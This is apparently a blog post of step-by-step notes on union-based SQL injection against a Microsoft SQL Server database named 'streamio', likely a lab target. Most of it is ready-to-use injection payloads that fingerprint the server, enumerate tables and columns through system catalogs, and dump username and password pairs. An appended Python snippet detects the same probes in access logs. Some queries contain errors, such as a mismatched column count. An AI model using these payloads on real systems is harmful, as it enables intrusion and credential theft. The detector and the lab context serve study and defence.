finding which result columns are echoed back to the page (the usable positions)
1' union select 1,2,3,4,5,6;-- -
positions 2 and 3 are echoed
detecting the MSSQL version
1' union select 1,@@version,3,4,5,6;-- -
confirming the current database
1' union select 1,db_name(),3,4,5,6;-- -  ## error (as observed)
--
unlike a global variable such as @@version, db_name() had to be wrapped in a subselect and selected from master..sysdatabases
1' union select 1,(select db_name()),3,4,5,6 from master..sysdatabases;-- -  ## true (note: the catalog is sysdatabases, not systemdatabases)
listing the user tables of the streamio database (the name db_name() returned)
1' union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='U';-- -  ## sysobjects of the target db; xtype lives here, not in sysdatabases
--
tip: in sysobjects a user-created table has xtype 'U', so we must filter on xtype when we query for tables
listing the columns using the table name and id found above
1' union select 1,col_name(object_id('users'),1),2,3,4,5,6 from sysobjects;-- -  X ## error (typos fixed; still fails for reasons a and b below)
--
a. we have to query the sysobjects catalog of the specific database (streamio..sysobjects), not a bare sysobjects
b. when we want to list columns with col_name(object_id('xx'), n) we also have to filter by the table id obtained above
--
1' union select 1,col_name(object_id('users'),2),3,4,5,6 from streamio..sysobjects
where id in (885578193,9051578250);-- -  ## ids come from the previous table listing; vary the column index (2 here) to walk the columns
extracting the data stored in those columns
1' union select 1,concat(username,0x7e,password),3,4,5,6 from users;-- -  ## 0x7e is a '~' separator
1' union select 1,concat(username,':',password),3,4,5,6 from users;-- -
end of steps
summary
the vital things in MSSQL injection queries are as follows:
1. two system catalogs: master..sysdatabases and <db>..sysobjects, where <db> is the name db_name() returns
2. when listing tables we must filter on xtype: SQL Server distinguishes user tables (xtype 'U') from system tables (xtype 'S')
3. if the data stored in a column is too big for the echoed position, we have to use concat to bring it out without truncation
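Added example, not from the original post: a small Python detector that flags the kind of union-based MSSQL probing shown in the steps above when it appears in web-server access logs. The log lines, IPs and paths below are constructed for the demo and are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page): three probes
# mirroring the steps above, plus one benign request that must not match.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=1%27+union+select+1,2,3,4,5,6;--+- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=1%27+union+select+1,@@version,3,4,5,6;--+- HTTP/1.1" 200 612
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=1%27+union+select+1,name,id,4,5,6+from+streamio..sysobjects+where+xtype=%27U%27;--+- HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=union+square+cafe HTTP/1.1" 200 300
"""

# Each rule: (label, compiled regex). Ordered from generic probing to MSSQL-specific
# catalog enumeration, so a hit on a later rule is higher confidence.
RULES = [
    ("union_probe", re.compile(r"'\s*union\s+select\b", re.I)),
    ("mssql_version", re.compile(r"@@version", re.I)),
    ("mssql_dbname", re.compile(r"\bdb_name\s*\(", re.I)),
    ("mssql_catalog", re.compile(r"\.\.\s*(sysobjects|sysdatabases)\b|\bcol_name\s*\(\s*object_id\s*\(", re.I)),
    ("mssql_comment_tail", re.compile(r";\s*--\s*-?\s*$")),
]

def extract_query(line):
    """Return the URL-decoded request path+query from a common-log-format line."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
    return unquote_plus(m.group(1)) if m else ""

def classify(line):
    """Return the list of rule labels that fire on one log line (empty = benign)."""
    q = extract_query(line)
    # Only the query string matters; drop the path.
    q = q.split("?", 1)[1] if "?" in q else ""
    return [label for label, rx in RULES if rx.search(q)]

def scan(log_text):
    """Map each offending line number (1-based) to the rules it triggered."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        labels = classify(line)
        if labels:
            hits[n] = labels
    return hits

if __name__ == "__main__":
    for n, labels in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(labels)}")
```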
Tags: actual,name,combat,database,--,id,union,mssql,select From: https://www.cnblogs.com/lisenMiller/p/17741799.html